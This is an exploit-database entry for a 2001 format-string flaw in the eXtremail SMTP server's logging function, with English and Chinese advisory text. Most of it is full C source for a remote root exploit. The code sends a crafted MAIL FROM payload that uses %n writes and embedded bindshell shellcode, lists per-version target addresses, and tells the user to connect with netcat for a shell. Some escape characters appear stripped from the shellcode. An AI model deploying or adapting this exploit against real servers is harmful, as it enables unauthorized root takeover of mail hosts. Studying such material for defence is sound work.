https://www.exploit-db.com/exploits/20953
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200106-114

CVE(CAN)ID:CAN-2001-1078eXtremail是一个pop3/smtpd邮件服务软件，它是免费的但是不开放源码。它可以运行在Linux和AIX系统下。eXtremail的flog()函数中存在一个格式串问题。用户可能利用SMTP或者POP3命令将格式串传送给服务器，攻击者可以修改任意的可访问的内存地址。由于eXtremail以root权限运行。远程攻击者可以远程获取root权限，也可能造成eXtremail服务的崩溃。

source: http://www.securityfocus.com/bid/2908/info
 
eXtremail is a freeware SMTP server available for Linux and AIX.
 
eXtremail contains a format-string vulnerability in its logging mechanism. Attackers can send SMTP commands argumented with maliciously constructed arguments that will exploit this vulnerability.
 
eXtremail runs with root privileges. By exploiting this vulnerability, remote attackers can gain superuser access on the underlying host and can crash eXtremail. If the system is not restarted automatically, a denial of SMTP service will result.
 
UPDATE (April 26, 2004): Reportedly, this vulnerability has been reintroduced into the new version (1.5.9) of eXtremail.
 
UPDATE (October 26, 2007): Reports indicate that the 'USER' command of eXtremail 2.1.1 and prior is still vulnerable. Symantec has not confirmed this. 

/* eXtremail-exp.c
 *
 * - eXtremail v1.1.5-9 Remote Root Exploit (x86) -
 *
 * - Tested on: RedHat 7.0 eXtremail v1.1.5
 *              RedHat 7.0 eXtremail v1.1.6
 *              RedHat 7.0 eXtremail v1.1.7
 *              RedHat 7.0 eXtremail v1.1.8
 *              RedHat 7.0 eXtremail v1.1.9
 *              NOT VULNERABLE eXtremail v1.1.10
 *
 * Copyright (c) 2001 by <[email protected]>
 *
 * eXtremail v1.1.5+ has a format string problem
 * in flog(). This problem affects all user commands
 * (helo/ehlo/mail from:/rcpt to:), and is caused
 * by an improper fprintf() to the servers logfile.
 *
 * Buffers for helo/ehlo are too small (except v1.1.5),
 * therefore we use mail from: instead :). 
 *
 * Note: Return Address's are quite tight due to the small
 *       buffers. Returning to the Heap is possible but
 *       is VERY unstable.
 *
 * Greets: mjm, [email protected], teleh0r, grazer, cmds, gollum, #!digit-labs
 *
 * http://www.digit-labs.org/ -- Digit-Labs 2001!@$!
 */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <errno.h>
#include <netdb.h>
#include <resolv.h>
#include <arpa/inet.h>
#include <netinet/in.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/time.h>
#include <sys/stat.h>

#define NOP		0x41
#define NUMVULN	4
#define OFFSET	0
#define PORT	25

void banner();
void mkfmt();
int opensocket(char *);
void usage();

char buf[520];
int buflength, type = 0, sock;
unsigned long target, retaddr;

unsigned char shellcode[]= /* lamagra bindshell code */
	"xebx6ex5ex29xc0x89x46x10"
	"x40x89xc3x89x46x0cx40x89"
    	"x46x08x8dx4ex08xb0x66xcd"
    	"x80x43xc6x46x10x10x88x46"
    	"x08x31xc0x31xd2x89x46x18"
    	"xb0x90x66x89x46x16x8dx4e"
    	"x14x89x4ex0cx8dx4ex08xb0"
    	"x66xcdx80x89x5ex0cx43x43"
    	"xb0x66xcdx80x89x56x0cx89"
    	"x56x10xb0x66x43xcdx80x86"
    	"xc3xb0x3fx29xc9xcdx80xb0"
    	"x3fx41xcdx80xb0x3fx41xcd"
    	"x80x88x56x07x89x76x0cx87"
    	"xf3x8dx4bx0cxb0x0bxcdx80"
    	"xe8x8dxffxffxffx2fx62x69"
    	"x6ex2fx73x68";

/*   target address's  -> objdump -R smtpd | grep "fflush"   */
struct {
	char *name;
	unsigned long target;
	unsigned long retaddr;
	int padding;
	int buflength;
} targets[] = {
        { "RedHat 7.0 eXtremail v1.1R5", 0x080864e0, 0xbf1ff64a, 1, 500},
        { "RedHat 7.0 eXtremail v1.1R6", 0x08089d5c, 0xbf1ff5d6, 1, 266},
        { "RedHat 7.0 eXtremail v1.1R7", 0x0808b3fc, 0xbf1ff5d6, 1, 266},
        { "RedHat 7.0 eXtremail v1.1R8", 0x0808b6fc, 0xbf1ff5d6, 1, 266},
        { "RedHat 7.0 eXtremail v1.1R9", 0x08088890, 0xbf1ff5d6, 1, 266},
        { 0 } };

void banner()
{
   fprintf(stderr, "neXtremail V1.1R5-9 remote root exploitn");
   fprintf(stderr, "by: <[email protected]>n");
   fprintf(stderr, "Copyright (c) 2001 Digit-Labs!@#$!n");
   fprintf(stderr, "http://www.digit-labs.orgnn");
}

void mkfmt()
{
   int i, j = 0, num;
   int bytesofar;
   int fmtints[4];
   char *bufptr;
   unsigned char temp[4];

   bytesofar = 35 + targets[type].padding;
   bufptr = &buf[strlen(buf)];

   temp[0] = (unsigned char) (target & 0x000000ff);
   temp[1] = (unsigned char)((target & 0x0000ff00) >> 8);
   temp[2] = (unsigned char)((target & 0x00ff0000) >> 16);
   temp[3] = (unsigned char)((target & 0xff000000) >> 24);

   for(i = 0; i < 4; i++)
   {
      sprintf(bufptr, "%c%c%c%c", temp[0], temp[1], temp[2], temp[3]);
      bufptr += 4;
      temp[0]++;
   }

   fmtints[0] = (int) (retaddr & 0x000000ff);
   fmtints[1] = (int)((retaddr & 0x0000ff00) >> 8);
   fmtints[2] = (int)((retaddr & 0x00ff0000) >> 16);
   fmtints[3] = (int)((retaddr & 0xff000000) >> 24);
   
   for(i = 0; i < 4; i++)
   {
      num = 0;

      if(fmtints[i] - bytesofar < 10)
      {
         while(num != 1)
         {
            fmtints[i] = (fmtints[i] + 0x100);
            if(fmtints[i] - bytesofar > 9)
            {
               fmtints[i] -= bytesofar;
               bytesofar += fmtints[i];
               num = 1;
            }
         }
      }
      else
      {
         fmtints[i] -= bytesofar;
         bytesofar += fmtints[i];
      }
   }

   sprintf(bufptr, "%%.%du%%38$n%%.%du%%39$n%%.%du%%40$n%%.%du%%41$n", fmtints[0], fmtints[1], fmtints[2], fmtints[3]);

   for(i = strlen(buf); i < buflength - strlen(shellcode) - 1; i++)
      buf[i] = NOP;

   for(i = i; i < buflength - 1; i++)
   {
      buf[i] = shellcode[j];
      j++;
   }

   buf[buflength - 1] = 'n';
   buf[buflength] = '';
   write(sock, buf, strlen(buf));
}

int opensocket(char *host)
{
   int s;
   struct sockaddr_in remote_sin;
   struct hostent *he;

   if((s = socket(PF_INET, SOCK_STREAM, IPPROTO_TCP)) == -1) {
      perror("socket()");
      return -1;
   }

   memset((char *)&remote_sin, 0, sizeof(remote_sin));
   if((he = gethostbyname(host)) != NULL)
      memcpy((char *)&remote_sin.sin_addr, he->h_addr, he->h_length);
   else if((remote_sin.sin_addr.s_addr = inet_addr(host)) < 0) {
         perror("gethostbyname()/inet_addr()");
         return -1;
   }

   remote_sin.sin_family = PF_INET;
   remote_sin.sin_port = htons(PORT);

   if(connect(s, (struct sockaddr *)&remote_sin, sizeof(remote_sin)) == -1) {
      perror("connect()");
      close(s);
      return -1;
   }
	      
   return s;
}

void usage()
{
   int i;

   fprintf(stderr, "Usage: ./extremail <host> [type]n");
   fprintf(stderr, "nTargets:n");

   for (i = 0; targets[i].name; i++)
      fprintf(stderr, "t%d.t%sn", i, targets[i].name);

   fprintf(stderr, "n");	
   exit(0);
}

int main (int argc, char *argv[])
{
   char *host;
   int i;

   banner();

   if(argc < 2)
      usage();
  
   if(argc >= 3)
      type = atoi(argv[2]);

   if(type > NUMVULN)
      type = 0;
   
   host = argv[1];
   buflength = targets[type].buflength;
   target = targets[type].target;
   retaddr = targets[type].retaddr + OFFSET;

   fprintf(stderr, "Target:tt%snType:tt%sn", host, targets[type].name);
   fprintf(stderr, "Target Address:t%pnReturn Address:t%pnOffset:tt%dn", target, retaddr, OFFSET);
   fprintf(stderr, "Buflength:t%dn", buflength);   

   if ((sock = opensocket(host)) <= 0)
      return -1;

   fprintf(stderr, "nConnected....n");

   memcpy(buf, "MAIL FROM:<", 11);
   
   for(i = 0; i < targets[type].padding; i++)
      buf[strlen(buf)] = 0x61;

   sleep(1);
   write(sock, "HELO digit-labs.org!@#$!n", 26);

   sleep(1);
   mkfmt();

   sleep(1);
   close(sock);

   fprintf(stderr, "n[1] sent payload....n");
   fprintf(stderr, "[2] waiting....n");
   sleep(2);
   fprintf(stderr, "[3] nc %s 36864 for shell....nn", host);

   return;
}

来源:XF
名称:extremail-flog-format-string(6733)
链接:http://xforce.iss.net/static/6733.php
来源:BID
名称:2908
链接:http://www.securityfocus.com/bid/2908
来源:www.extremail.com
链接:http://www.extremail.com/news.htm
来源:www.extremail.com
链接:http://www.extremail.com/history.htm
来源:BUGTRAQ
名称:20010622eXtremailRemoteFormatString(‘s)
链接:http://archives.neohapsis.com/archives/bugtraq/2001-06/0291.html